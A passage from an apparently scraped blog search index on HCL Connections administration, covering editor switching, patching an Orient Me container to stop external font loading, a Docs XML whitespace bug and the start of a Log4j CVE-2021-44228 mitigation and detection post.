style=\"color:#268bd2\"\u003eUnable\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eto\u003c/span\u003e \u003cspan style=\"color:#cb4b16\"\u003eload\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003ehttps\u003c/span\u003e://\u003cspan style=\"color:#268bd2\"\u003ecnx\u003c/span\u003e-\u003cspan style=\"color:#268bd2\"\u003efqdn\u003c/span\u003e/\u003cspan style=\"color:#268bd2\"\u003epush\u003c/span\u003e/\u003cspan style=\"color:#268bd2\"\u003eservice\u003c/span\u003e/\u003cspan style=\"color:#268bd2\"\u003einfo\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003estatus\u003c/span\u003e: \u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e500\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","ref":"https://stoeps.de/posts/2022/kb_pushnotification_broken_after_upgrading_to_cfix.65cr1.2201/","title":"KB: PushNotification broken after upgrading to CFix.65CR1.2201"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/push/","title":"Push"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/pushnotification/","title":"Pushnotification"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/pushnotification/","title":"Pushnotification"},{"body":"When I test topics with the different Connections editors (CKEditor, Textbox.io and TinyMCE), I always used multiple users in my test environment, installed the editor selector ear and then gave each of the test users a different editor. That\u0026rsquo;s easy with the different j2ee roles, but I always had to use multiple browsers or sandboxes to see them next to each other.\nSelection with URL parameter without changing the user During a support call with Tiny and HCL I learned, that you can switch the editor with a URL parameter. So no need to change the configuration or use the tinyeditorselector.ear.\nAdd the following snippet (case-sensitive!) to the URL you want to call:\nCKEditor ?editor=CKEditor Textbox.io ?editor=textbox.io TinyMCE ?editor=TinyMCE When there is already an option added to the URL, just add this snippet and replace ? with \u0026amp;\nExample Open a blog post: https://preview.hclconnections.net/blogs/97886d2e-9f86-4f49-b74c-b0b525ae7689?lang=en_us this will open the blogs overview, now select New Entry and you are redirected to https://preview.hclconnections.net/blogs/roller-ui/authoring/weblog.do?method=create\u0026amp;weblog=97886d2e-9f86-4f49-b74c-b0b525ae7689\u0026amp;lang=en_us.\nIn my case this opens the TinyMCE editor as the default:\nSo now lets change the URL to: https://preview.hclconnections.net/blogs/roller-ui/authoring/weblog.do?method=create\u0026amp;weblog=97886d2e-9f86-4f49-b74c-b0b525ae7689\u0026amp;lang=en_us\u0026amp;editor=textbox.io\nand the same page with Textbox.io is loaded.\nAnd finally change the URL to: https://preview.hclconnections.net/blogs/roller-ui/authoring/weblog.do?method=create\u0026amp;weblog=97886d2e-9f86-4f49-b74c-b0b525ae7689\u0026amp;lang=en_us\u0026amp;editor=CKEditor\nand CKEditor loads and can be used.\nSo a perfect way to fast change to a different editor, do some tests and screenshots and then go back to your default.\nBe aware that some Connections URLs use a #, then you need the additional URL parameter before the # sign!\nWiki Example https://preview.hclconnections.net/wikis/home?lang=en-us#!/wiki/W269d1b93c705_4ebe_9986_1964c6dd6bfa/page/Welcome%20to%20Testing%20Metrics/edit here use https://preview.hclconnections.net/wikis/home?lang=en-us\u0026amp;editor=textbox.io#!/wiki/W269d1b93c705_4ebe_9986_1964c6dd6bfa/page/Welcome%20to%20Testing%20Metrics/edit\n","excerpt":"\u003cp\u003eWhen I test topics with the different Connections editors (CKEditor, Textbox.io and TinyMCE), I always used multiple users in my test environment, installed the editor selector ear and then gave each of the test users a different editor. That\u0026rsquo;s easy with the different j2ee roles, but I always had to use multiple browsers or sandboxes to see them next to each other.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/change_connections_editor_on_the_fly/","title":"Change the Connections editor on the fly"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/cnx/","title":"Cnx"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/editor/","title":"Editor"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/editor/","title":"Editor"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/ibmcnx/","title":"Ibmcnx"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tiny/","title":"Tiny"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tiny/","title":"Tiny"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/orient-me/","title":"Orient Me"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/trace/","title":"Trace"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/troubleshooting/","title":"Troubleshooting"},{"body":"HCL Support published a collection of links to MustGather informations for Connections and addons. That\u0026rsquo;s the perfect starting point to start troubleshooting and collecting logs for your support cases.\nCollecting Data: Repository of MustGather for Connections ","excerpt":"\u003cp\u003e\u003ca href=\"https://support.hcltechsw.com/csm?id=csm_index\" target=\"_blank\"\u003eHCL Support \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n published a collection of links to MustGather informations for Connections and addons. That\u0026rsquo;s the perfect starting point to start troubleshooting and collecting logs for your support cases.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://support.hcltechsw.com/csm?id=kb_article\u0026amp;sysparm_article=KB0020711\" target=\"_blank\"\u003eCollecting Data: Repository of MustGather for Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2022/mustgather/","title":"Useful KB Doc: MustGather for Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/container/","title":"Container"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/image/","title":"Image"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/patch/","title":"Patch"},{"body":"I wrote about font loading from external CDN in the post Hiding The Create Community Button 2nd last year and hoped this is finally fixed for all Connections applications. A good summary on the reasons to not allow external font loading is Blocking Web Fonts for Speed and Privacy .\nSo I checked with a Connections 7 deployment with the latest CFix (CFix.70.2112) deployed, if this is still an issue with Connections.\nIn former Connections\u0026rsquo; versions we found external fonts loaded in Orient Me (/social), Communities Catalog (/communities) and the Admin panel (/cnxadmin/).\nOrient Me and the Community catalog are loading fonts from Unpkg and the Admin Panel from fonts.gstatic.com.\nThere was a long discussion in the Connections Community Forum which ended with a comment of the Connections Product Management that this will be fixed in a future version.\nIn the meantime the font loading in Communities catalog is fixed, when the CATALOG_CARD_UPDATED=true, but Orient Me and Admin panel are still loading external fonts. That can be related to the fact that Component Pack didn\u0026rsquo;t get updates since May 2021. As I don\u0026rsquo;t want to wait any longer, I had a look if we can fix this on our own.\nOrient Me is running as container, so it is not enough to edit a file, because this will be overwritten when the container is deleted and gets recreated from the default image.\nI hate to type -n connections over and over again with the kubectl command. To set the default namespace to connections, run this command:\nkubectl config set-context --current --namespace=connections This is saved in ~/.kube/config and is persistent.\nEdit the pod After some research, the easiest way to remove the external CDN from the Orient Me container is the following way:\nkubectl get pods ... orient-web-client-77dbff4d58-4h69x 1/1 Running 0 132m ... Now we run a shell in the running Orient Me container (use the name you found with the command above, when you have multiple pods running, use one of them, but make a note of the name):\nkubectl exec -it orient-web-client-77dbff4d58-4h69x -- sh Some grep and find showed, that the only file we need to change for left-to-right languages is /home/ibm/app/public/dist/js/ic-orient-4a833568f93c16c17c7c5e29f6f073d6.css and /home/ibm/app/public/dist/js/ic-orient-4a833568f93c16c17c7c5e29f6f073d6.rtl.css for right-to-left.\nAdditionally I searched within the container and in the requests of my browser if I can find the used fonts on the system. I found that all IBM*.woff2 fonts are included in the Orient Me container, but also they are already used in several apps within Connections. The Communities catalog for example load them from https://\u0026lt;connections-host\u0026gt;/connections/ui/dist/.\nRewrite the font URL in the CSS file I wanted to avoid massive changes in the container, so I decided to change the fonts URLs to this path. Run the following in the container shell you opened above:\nsed -i \u0026#39;s#https://unpkg.com/carbon-components@latest/src/globals/#/connections/ui/dist/#g\u0026#39; /home/ibm/app/public/dist/js/ic-orient-4a833568f93c16c17c7c5e29f6f073d6.css sed -i \u0026#39;s#https://unpkg.com/carbon-components@latest/src/globals/#/connections/ui/dist/#g\u0026#39; /home/ibm/app/public/dist/js/ic-orient-4a833568f93c16c17c7c5e29f6f073d6.rtl.css Now when we open Orient Me (/social) it already loads the font directly from Connections, but this change is not persistent, it will be overwritten when you delete the Orient Me pod.\nMake your patch persistent I this should be run on the node where the Orient Me container you changed is running. To find it:\nkubectl get pods -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES ... orient-web-client-77dbff4d58-4h69x 1/1 Running 0 146m 192.168.68.210 cnx7-cp.stoeps.home \u0026lt;none\u0026gt; \u0026lt;none\u0026gt; ... Find the Docker image docker ps | grep orient-web-client-77dbff4d58-4h69x 4b1ed5bb12d6 fd0bb831f5e6 \u0026#34;docker-entrypoint.s…\u0026#34; 2 hours ago Up 2 hours k8s_orient-web-client_orient-web-client-77dbff4d58-4h69x_connections_f5b463e7-6c77-446a-92e0-56115765bcff_0 bcdd9ba8c2c6 k8s.gcr.io/pause:3.2 \u0026#34;/pause\u0026#34; 2 hours ago Up 2 hours k8s_POD_orient-web-client-77dbff4d58-4h69x_connections_f5b463e7-6c77-446a-92e0-56115765bcff_0 Here we need the line with the docker-entrypoint command and copy the value from the first column (4b1ed5bb12d6)\nLet\u0026rsquo;s check the used tag for our Orient Me image:\ndocker image ls | grep orient-web cnx7-cp.stoeps.home:5000/connections/orient-web-client 20210426-155510 d4ce676e668e 3 hours ago 577MB Here we see the registry URL: cnx7-cp.stoeps.home:5000, image name: connections/orient-web-client and tag: 20210426-155510. Now we can commit the change and write a new image with a different timestamp as tag. Use the container hash 4b1ed5bb12d6 from above to identify and tag the right image!\ndocker commit 4b1ed5bb12d cnx7-cp.stoeps.home:5000/connections/orient-web-client:20220114-151700 Check the image names and tags docker image ls | grep orient-web cnx7-cp.stoeps.home:5000/connections/orient-web-client 20220114-151700 fd0bb831f5e6 3 hours ago 577MB cnx7-cp.stoeps.home:5000/connections/orient-web-client 20210426-155510 d4ce676e668e 3 hours ago 577MB Check the Entrypoint of old and new image docker inspect --format=\u0026#39;{{ .Config.Entrypoint }}\u0026#39; cnx7-cp.stoeps.home:5000/connections/orient-web-client:20220114-151700 docker inspect --format=\u0026#39;{{ .Config.Entrypoint }}\u0026#39; cnx7-cp.stoeps.home:5000/connections/orient-web-client:20210426-155510 This should return the same ENTRYPOINT! If not, go back to the commit step and use:\ndocker commit --change=\u0026#39;ENTRYPOINT [\u0026#34;\u0026lt;Use return value of the inspect command here\u0026gt;\u0026#34;]\u0026#39; 4b1ed5bb12d cnx7-cp.stoeps.home:5000/connections/orient-web-client:20220114-151700 Upload the image to the docker registry: docker push cnx7-cp.stoeps.home:5000/connections/orient-web-client:20220114-151700 Update deployment Now we only need to update the deployment that it uses our new container image (always keep the old image, so you can revert back).\nkubectl edit deployment orient-web-client This opens a yaml with the configuration of the pod. Search for the line:\nimage: cnx7-cp.stoeps.home:5000/connections/orient-web-client:20210426-151700 and change it to\nimage: cnx7-cp.stoeps.home:5000/connections/orient-web-client:20220114-155510 Save and close the file (default uses vi, so :wq will save and close), this will restart all container in this deployment. Wait some seconds, check if Orient Me is running again, then you can test if the fonts are loaded from a local resource or unpkg.\nNormally changing the deployment will restart all pods of the deployment. You can run the following command to restart Orient Me to be sure that it pulls the new image:\nkubectl rollout restart deployment orient-web-client Comment In former talks I showed the advantages of containers. Building them automatically on a regular basis can help to get a more secure product. So even when you don\u0026rsquo;t want to build a container again (which should be a no-brainer with the right ci/cd pipelines), you can add the two lines of sed and one piece is fixed.\nThe book Hacking Kubernetes from Michael Hausenblas and Andrew Martin recommend rebuilding containers all 30 days. So I see forward when we get the next updates for Component Pack and until then I will change this on my own.\n","excerpt":"\u003cp\u003eI wrote about font loading from external CDN in the post \u003ca href=\"/posts/2021/hide-community-button-second/\"\u003eHiding The Create Community Button 2nd\u003c/a\u003e\n last year and hoped this is finally fixed for all Connections applications. A good summary on the reasons to not allow external font loading is \u003ca href=\"https://collinmbarrett.com/block-web-fonts/\" target=\"_blank\"\u003eBlocking Web Fonts for Speed and Privacy \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eSo I checked with a Connections 7 deployment with the latest CFix (CFix.70.2112) deployed, if this is still an issue with Connections.\u003c/p\u003e\n\u003cp\u003eIn former Connections\u0026rsquo; versions we found external fonts loaded in Orient Me (\u003ccode\u003e/social\u003c/code\u003e), Communities Catalog (\u003ccode\u003e/communities\u003c/code\u003e) and the Admin panel (\u003ccode\u003e/cnxadmin/\u003c/code\u003e).\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/patch_orientme_container/","title":"Patch Orient Me Container"},{"body":"You can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\nEngage \u0026ndash; https://engage.ug HCL Connections Admin Toolbox Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/engage2022-admintoolbox.html) Dachnug49 \u0026ndash; https://dnug.de/dachnug49/ HCL Connections Admin Toolbox Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/dachnug49-admintoolbox.html) Froscon \u0026ndash; https://froscon.org Checkliste fuer Universaldilettanten gemeinsam mit Martin Leyrer Checkliste fuer Universaldilettanten Video Troubleshooting von Enterprise Web Applikationen mit Open Source Tools Troubleshooting (Enterprise) Web Applikationen mit Open Source Tools Video Slides Your browser does not support this, go to the presentation directly: [Troubleshooting (Enterprise) Web Applikationen mit Open Source Tools](https://share.stoeps.de/froscon2022-oss-toolbox.html) ","excerpt":"\u003cp\u003eYou can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\u003c/p\u003e\n\u003ch2 id=\"engage-\"\u003eEngage \u0026ndash; \u003ca href=\"https://engage.ug\" target=\"_blank\"\u003ehttps://engage.ug \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#engage-\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/engage2022-admintoolbox.html\" target=\"_blank\"\u003eHCL Connections Admin Toolbox \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ciframe width=\"1024\" height=\"576\" marginheight=\"0\" marginwidth=\"0\" src=\"https://share.stoeps.de/engage2022-admintoolbox.html\"\u003e\n Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/engage2022-admintoolbox.html)\n\u003c/iframe\u003e\n\u003ch2 id=\"dachnug49-\"\u003eDachnug49 \u0026ndash; \u003ca href=\"https://dnug.de/dachnug49/\" target=\"_blank\"\u003ehttps://dnug.de/dachnug49/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#dachnug49-\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/dachnug49-admintoolbox.html\" target=\"_blank\"\u003eHCL Connections Admin Toolbox \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ciframe width=\"1024\" height=\"576\" marginheight=\"0\" marginwidth=\"0\" src=\"https://share.stoeps.de/dachnug49-admintoolbox.html\"\u003e\n Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/dachnug49-admintoolbox.html)\n\u003c/iframe\u003e\n\u003chr\u003e\n\u003ch2 id=\"froscon-\"\u003eFroscon \u0026ndash; \u003ca href=\"https://froscon.org\" target=\"_blank\"\u003ehttps://froscon.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#froscon-\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"checkliste-fuer-universaldilettanten\"\u003eCheckliste fuer Universaldilettanten \u003ca href=\"#checkliste-fuer-universaldilettanten\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003egemeinsam mit \u003ca href=\"https://martin.leyrer.priv.at\" target=\"_blank\"\u003eMartin Leyrer \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2022-08%20FrOSCon%20-%20Checkliste%20f%c3%bcr%20Universal-dilettanten.pdf\" target=\"_blank\"\u003eCheckliste fuer Universaldilettanten \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4 id=\"video\"\u003eVideo \u003ca href=\"#video\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h4\u003e\n\n\u003ciframe width=\"1024\" height=\"576\" src=\"https://media.ccc.de/v/froscon2022-2791-checkliste_fur_universaldilettanten/oembed\" frameborder=\"0\" allowfullscreen\u003e\u003c/iframe\u003e\n\u003chr\u003e\n\u003ch3 id=\"troubleshooting-von-enterprise-web-applikationen-mit-open-source-tools\"\u003eTroubleshooting von Enterprise Web Applikationen mit Open Source Tools \u003ca href=\"#troubleshooting-von-enterprise-web-applikationen-mit-open-source-tools\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/froscon2022-oss-toolbox.html\" target=\"_blank\"\u003eTroubleshooting (Enterprise) Web Applikationen mit Open Source Tools \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4 id=\"video-1\"\u003eVideo \u003ca href=\"#video-1\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h4\u003e\n\n\u003ciframe width=\"1024\" height=\"576\" src=\"https://media.ccc.de/v/froscon2022-2782-troubleshooting_enterprise_web_applikationen_mit_opensource_tools/oembed\" frameborder=\"0\" allowfullscreen\u003e\u003c/iframe\u003e\n\u003ch4 id=\"slides\"\u003eSlides \u003ca href=\"#slides\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h4\u003e\n\n\u003ciframe width=\"1024\" height=\"576\" marginheight=\"0\" marginwidth=\"0\" src=\"https://share.stoeps.de/froscon2022-oss-toolbox.html\"\u003e\n Your browser does not support this, go to the presentation directly: [Troubleshooting (Enterprise) Web Applikationen mit Open Source Tools](https://share.stoeps.de/froscon2022-oss-toolbox.html)\n\u003c/iframe\u003e","ref":"https://stoeps.de/speaking/2022/","title":"Talks 2022"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/code/","title":"Code"},{"body":"I installed HCL Connections Docs 2.0.1 on top of an already installed HCL Connections 6.5CR1 with Docs Viewer. Usually a simple task, the installation was smooth, after the mandatory restart the Edit button in the files\u0026rsquo; application appeared and all looked good, but when the users clicked on edit a white page was loaded.\nI checked the application itself starting with a version check on https://mydomain.tld/docs/version and the version was displayed.\nThe funny part was that the test environment installed with the same script ran flawlessly with the same settings. I had an issue with the hostname of the environment when we started with Invite. Invite didn\u0026rsquo;t understand the single sign on domain, because the hostname has only two parts domain.tld. Invite got a fix and works now, but the first thought was maybe the two part hostname was again involved, and the test environment uses test.domain.tld which worked in Invite too.\nThe SystemOut.log showed following message when a user tried to open a file in the editor.\nSome lines below there was an SSO error message with the domain.tld. So I still thought about the hostname. So I installed a new test environment to double-check that the issue is not hostname related. The test server deployment worked fine with a two part hostname \u0026hellip;\nBack to the production server I started comparing everything with test, the JSON files are stored in git, so I could compare line by line. I checked the whole IBMDocs-config-directory, no success. Docs still loads the white page.\nThe environment is running about 6 years now and was updated from 4.0 to 4.5 to 5.0 to 5.5 and finally 6.5. The 6.5CR1 ran nearly a year until I installed Docs on top (Viewer was installed since the beginning and updated to 2.0.1 during the 6.5CR1 deployment).\nSo I searched the whole Docs stuff, double-checked conversion which was moved to Linux during the 6.5 migration, checked access rights and so on. Enabled tracing but there was nothing in the trace.log which would explain the error message:\nNoSuchAlgorithmException sounded just weird. So I went through all documents about TLSv1.2 in the HCL documentation and knowledge base :\nForcing traffic to use TLS 1.2 Can\u0026rsquo;t create/edit document in Docs - Connections Some restarts later I just wanted to give up (which means opening a case with HCL), so I downloaded the git repository with all configs and started to put everything together. This time I had a look into LotusConnections-config.xml which looked somehow strange formatted.\n\u0026lt;sloc:serviceReference acf_config_file=\u0026#34;acp-configkey__stoeps.xml\u0026#34; bootstrapHost=\u0026#34;admin_replace\u0026#34; bootstrapPort=\u0026#34;admin_replace\u0026#34; clusterName=\u0026#34;Util\u0026#34; enabled=\u0026#34;true\u0026#34; serviceName=\u0026#34;rte\u0026#34; ssl_enabled=\u0026#34;true\u0026#34; \u0026gt; \u0026lt;sloc:href\u0026gt; \u0026lt;sloc:hrefPathPrefix\u0026gt;/connections/rte\u0026lt;/sloc:hrefPathPrefix\u0026gt; \u0026lt;sloc:static href=\u0026#34;http://cnx7-was.stoeps.home\u0026#34; ssl_href=\u0026#34;https://cnx7-was.stoeps.home\u0026#34; /\u0026gt; \u0026lt;sloc:interService href=\u0026#34;https://cnx7-was.stoeps.home\u0026#34; /\u0026gt; \u0026lt;/sloc:href\u0026gt; \u0026lt;/sloc:serviceReference\u0026gt; There were way more line breaks than I would have expected.\nNormally the xml looks like this:\n\u0026lt;sloc:serviceReference acf_config_file=\u0026#34;acp-configkey__stoeps.xml\u0026#34; bootstrapHost=\u0026#34;admin_replace\u0026#34; bootstrapPort=\u0026#34;admin_replace\u0026#34; clusterName=\u0026#34;Util\u0026#34; enabled=\u0026#34;true\u0026#34; serviceName=\u0026#34;rte\u0026#34; ssl_enabled=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;sloc:href\u0026gt; \u0026lt;sloc:hrefPathPrefix\u0026gt;/connections/rte\u0026lt;/sloc:hrefPathPrefix\u0026gt; \u0026lt;sloc:static href=\u0026#34;http://cnx7-was.stoeps.home\u0026#34; ssl_href=\u0026#34;https://cnx7-was.stoeps.home\u0026#34; /\u0026gt; \u0026lt;sloc:interService href=\u0026#34;https://cnx7-was.stoeps.home\u0026#34; /\u0026gt; \u0026lt;/sloc:href\u0026gt; \u0026lt;/sloc:serviceReference\u0026gt; And the end of the file (genericProperty section):\n\u0026lt;genericProperty name=\u0026#34;com.ibm.connections.SSLProtocol\u0026#34;\u0026gt; TLSv1.2 \u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;icec.light\u0026#34;\u0026gt; true \u0026lt;/genericProperty\u0026gt; Weird, but still the xmllint tool showed the file is valid XML (check in and out validated the XML too), and all Connections and Docs Viewer are working without any issue, but the formatting remembered me about the TLSv1.2 message in SystemOut.log.\nSo I gave it a try and reformatted the XML, so all whitespace was removed.\n\u0026lt;genericProperty name=\u0026#34;com.ibm.connections.SSLProtocol\u0026#34;\u0026gt;TLSv1.2\u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;icec.light\u0026#34;\u0026gt;true\u0026lt;/genericProperty\u0026gt; I synchronized the nodes and restarted all application servers to be sure that the new configuration was loaded. The Docs-Server now showed this message on startup:\nWow! No line break or algorithm exception.\nI opened Files \u0026gt; Edit document and Docs loads the document and all looks good now. So for me, it looks like that Docs does not ignore Whitespace in the XML configuration and all other applications do.\nSummary I checked the git history when the XML was reformatted, and it was already there in 5.5, maybe earlier. I edit everything in VIM and I haven\u0026rsquo;t enabled linting or automatic code format there, but sometimes I have to use VS Code and I found that some XML add-ons format XML on save and there are settings which move attributes to new lines. So I suspect that this happened years ago, someone edited with Code (or something similar) and on save the code was reformatted, as no error appeared, the change was committed.\nLessons I learned Always check LotusConnections-config.xml when an application shows an error. They all read base configuration from there. This is BTW the reason that you have to restart all Connections\u0026rsquo; application after changing LotusConnections-config.xml.\nSecond, when you use a two part hostname in production, then use a two part hostname for your test environment too!\n","excerpt":"\u003cp\u003eI installed HCL Connections Docs 2.0.1 on top of an already installed HCL Connections 6.5CR1 with Docs Viewer. Usually a simple task, the installation was smooth, after the mandatory restart the \u003ccode\u003eEdit\u003c/code\u003e button in the files\u0026rsquo; application appeared and all looked good, but when the users clicked on \u003ccode\u003eedit\u003c/code\u003e a white page was loaded.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/connections_docs_tls_and_xml/","title":"Connections Docs, TLSv1.2 and XML Format"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/docs/","title":"Docs"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/highlight/","title":"Highlight"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/lcc/","title":"Lcc"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/lint/","title":"Lint"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/validation/","title":"Validation"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/xml/","title":"Xml"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/xml/","title":"Xml"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/cve/","title":"Cve"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/cve-2021-44228/","title":"Cve-2021-44228"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/log4j/","title":"Log4j"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/log4j/","title":"Log4j"},{"body":"Update 2021-12-13 2021-12-15\nElasticsearch: Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31 HCL: CVE-2021-44228 : Security Advisory IBM: Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228) Security Bulletin: HCL Connections Security Update for Apache Log4j 2 Vulnerability (CVE-2021-44228) CVE-2021-45046: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. So there is a fix for kc.war which updates the log4j 2.8 to 2.15, Elasticsearch in Component Pack has log4j 2.8 and 2.11 included but is not vulnerable because of additional security settings.\nThere are additional security layers in the Component Pack Elasticsearch, like SearchGuard , but the advisory for Elasticsearch tells clearly you should update.\nOriginal post Yesterday several security advisories arrived in my Inbox and people were worried about a 0-day vulnerability in Apache Log4j .\nI read a lot during the last 24 hours and searched for log4j versions within HCL Connections. I wanted to write about some of these commands already since weeks, so I use the awareness to show you some fast options to scan all packages in container images, file system and registries. For me one of the hardest points was to find out, if the software is using log4j and which version.\nAs far as I know, only the Help.ear has a log4j 2.3 included, so you have two options, stop it and wait for a fix, or add the JVM option to your cluster remove the class from the jar.\nIn my test installation I couldn\u0026rsquo;t find it, so maybe an add-on installed it in other environments.\nSo the used version log4j-2.3 is not secured with the JVM option log4j2.formatMsgNoLookups! You have to stop the Help application until a fix is available, or remove the JndiLookup.class from the jar file.\nFinally, HCL released a Security Advisory with workarounds.\nMitigation: In releases \u0026gt;=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath:\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\nHCL Support: CVE-2021-44228 : Security Advisory But without such advisory, how can we detect if our systems uses the vulnerable library?\nHCL License files When you want to know if HCL Connections has log4j included, you check the license files.\nWithin the Connections\u0026rsquo; installation folder you find the HCL and non-HCL licenses of the installed products. So we can grep for log4j there:\ncd /opt/HCL/Connections/lafiles grep log4j * notices:log4j.settings_1.0.0.20200928-1215.jar\tnotices:log4j-1.2.11.jar\tThe Apache Software Foundation ... So in notices we see the licenses and version numbers of all Open Source libraries of Connections.\nLinux find Next option is to search for the jar files within the file system. In my case, I started on the WebSphere Application server and scanned the installedApps folder.\n[root@cnx7-was ~]# cd 